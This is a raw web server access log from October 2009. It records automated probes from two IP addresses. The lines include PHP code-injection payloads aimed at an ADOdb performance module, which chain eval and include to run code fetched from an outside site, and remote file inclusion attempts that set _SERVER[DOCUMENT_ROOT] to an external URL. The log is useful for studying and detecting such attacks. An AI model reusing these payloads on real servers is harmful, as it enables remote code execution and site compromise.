61.135.134.109 - - [06/Oct/2009:03:35:11 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:22 -0400] "GET /logs/access_log.Q109080400%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:22 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:22 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:22 -0400] "GET /logs/access_log.Q109092000%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:23 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:23 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:23 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:23 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:24 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:24 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
